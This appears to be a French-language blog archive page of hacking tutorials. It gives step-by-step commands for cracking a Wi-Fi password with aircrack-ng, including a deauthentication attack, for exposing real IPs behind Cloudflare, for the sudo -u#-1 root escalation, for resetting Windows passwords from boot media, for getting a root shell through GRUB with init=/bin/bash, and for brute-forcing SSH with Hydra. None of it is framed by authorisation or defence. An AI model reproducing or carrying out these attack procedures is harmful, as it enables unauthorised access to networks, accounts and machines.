Archives des Hacking - Over Computing

Aircrack-ng est une suite d’outils permettant de rentrer dans un réseau wi-fi

On va commencer par identifier nos cartes réseaux qui sont capable de scanner du wi-fi, en soit notre carte WIFI. iwconfig

Ici je vois que le nom de ma carte réseau qui peut le faire est wlp3s0

Nous avons besoin de passer notre carte WIFI en mode monitor, lui permettant d’écouter tout le traffic sur les réseaux WIFI.

airmon-ng start wlp3s0

Si on recheck notre carte réseau avec iwconfig , on voit que son nom à changer wlp3s0mon à la fin pour indiquer qu’elle est en mode ” monitor ”

On va commencer à regarder tout le traffic que la carte arrive à capturer pour déterminer les réseaux.

airodump-ng wlp3s0mon

Analyse de ce réseau

airodump-ng -c 6 --bssid 22:0F:47:7F:AD:ED -w oneplus7tpro wlp3s0mon

Description de la commande:
L’option ‑c spécifie le channel, récupéré précédemment “CH”.
L’option –bssid spécifie l’adresse MAC du routeur, récupéré précédemment.
L’option ‑w spécifie le nom du fichier, je prend pour habitude de mettre le même nom de fichier que celui du réseau.

On peut voir que j’ai déjà récupéré le Handshake, en haut à droite de la capture d’écran. Si le handshake n’est pas récupéré, vous pouvez le récupéré grace à l’étape suivante.
La catégorie station montre qu’il y’a un équipement de connecté au point d’accès wifi.

Envoi d’une demande de déconnexion

Ceci est transparent pour l’utilisateur final. Elle permet de récupérer un handshake plus rapidement.

aireplay-ng -0 2 -a 22:0F:47:7F:AD:ED -c D0:B1:28:89:54:E9 wlp3s0mon

Description de la commande:
L’option ‑0 2 spécifie l’envoi de deux demandes de déconnexion.
L’option ‑a spécifie l’adresse MAC du routeur ( BSSID ).
L’option ‑c spécifie l’adresse MAC de l’appareil actuellement connecté.

Bruteforce du mot de passe

aircrack-ng oneplus7tpro.cap dictionnaire

CloudUnflare permet le contournement de CloudFlare et donne les vrais adresses IP ainsi que les sous-domaines des sites

Vous aurez besoin d’un compte au préalable sur https://completedns.com
L’inscription est simple et rapide

Installation des dépendances

sudo apt install curl dnsutils whois

Clonage du dépôt

git clone https://github.com/greycatz/CloudUnflare.git

On se déplace dans le répertoire

cd CloudUnflare

On modifie le script

vim cloudunflare.bash

Sur la ligne 4 ” CompleteDNS_Login=‘e‑mail|mot_de_passe ’ ”

On exécute le script

bash cloudunflare.bash

Une faille critique est apparu dans Sudo, toutes les versions de sudo en dessous de 1.8.28 sont concernés.

Connaitre sa version de Sudo

sudo -V

Pour se connecter en tant que super-utilisateur il suffit de taper

sudo -u#-1 -s

Mais il faut pour cela que l’utilisateur soit spécifié dans le fichier sudoers en tant qu’interdiction de devenir root tel que:

theophile ALL=(ALL, !root) ALL

Pour accéder à un système Windows, il existe différents moyens tel que Kon-Boot et Médicat.

Kon-Bootv2.5 ne fonctionne plus depuis la version 1903

Il suffisait de boot sur l’Iso et d’attendre cet écran

Médicat

Médicat est un couteau-suisse qui contient un mini-windows 10 en liveCD, et lubuntu. Il contient beaucoup d’outils qui permettent la réparation d’ordinateur. Ici nous allons voir comment réinitialiser le mot de passe.

On boot sur le LiveCD

On démarre le logiciel ” Reset User Passwords ”

Ici l’utilisateur est “Théo” et on appuie sur Reset Password, on redémarre et le tour est joué !

GRUB pour Grand Unified Bootloader est un programme d’amorçage. Il est existant sur n’importe quelle machine à partir du moment ou un système d’exploitation de type Linux/Unix est présent.

Démarrage du système d’exploitation:

Au démarrage de la machine, après le passage du BIOS, le grub apparait.

Positionnez le sélecteur sur le système d’exploitation dont vous souhaitez amorcer. Éditez le en appuyant sur la touche “e”

On descend un peu dans le fichier de configuration, on change le ro par rw ( Read Only par Read Write, ce qui permet d’avoir les droits de lecture et d’écriture. On ajoute à la fin de cette ligne ” init=/bin/bash ” puis vous appuyez sur F10, le fichier de configuration se lance

On descend un peu dans le fichier de configuration, on change le ro par rw ( Read Only par Read Write ), ce qui permet d’avoir les droits de lecture et d’écriture. On ajoute à la fin de cette ligne ” init=/bin/bash ” puis vous appuyez sur F10, le fichier de configuration se lance.

Pour exécuter des commandes normalements, vous allez peut-être avoir besoin de remonter vos partitions

mount -o remount,rw /

Vous avez maintenant accès à la machine avec les droits root !

Hydra est un logiciel performant qui permet le brute-force de mot passe dans plusieurs catégories tel que le web, ftp etc…

Mise en place

Il utilise pour cela, un dictionnaire de mot de passe, vous pouvez en trouver ici:
–> https://github.com/danielmiessler/SecLists
Pour les télécharger :

git clone https://github.com/danielmiessler/SecLists.git

Installation

Le paquet est présent de base dans les dépôts de Debian.

apt install hydra
apt install hydra-gtk ; Présente l’interface Graphique

Utilisation

Il existe un script qui permet d’exécuter hydra rapidement et simplement en posant seulement quelques questions nécessaires.

hydra-wizard

Les options avec hydra sont les suivantes:

-l si l’on connait le login ( user, admin, root … )
-p si l’on souhaite essayer un mot de passe particulier
-L Indique le chemin du dictionnaire de nom d’utilisateur
-P Indique le chemin du dictionnaire de mot de passe
-M Indique le chemin du fichier contenant tous les hôtes Les services les plus communs pouvant être attaqués sont ssh, ftp, smb, pour voir la totalité des services:
hydra ‑h

Exemples:
hydra -L /home/theophile/Bureau/namelist.txt -P /home/theophile/Bureau/passlist.txt 192.168.43.198 ssh
hydra -l admin -p password -M /home/theophile/Bureau/target.txt ssh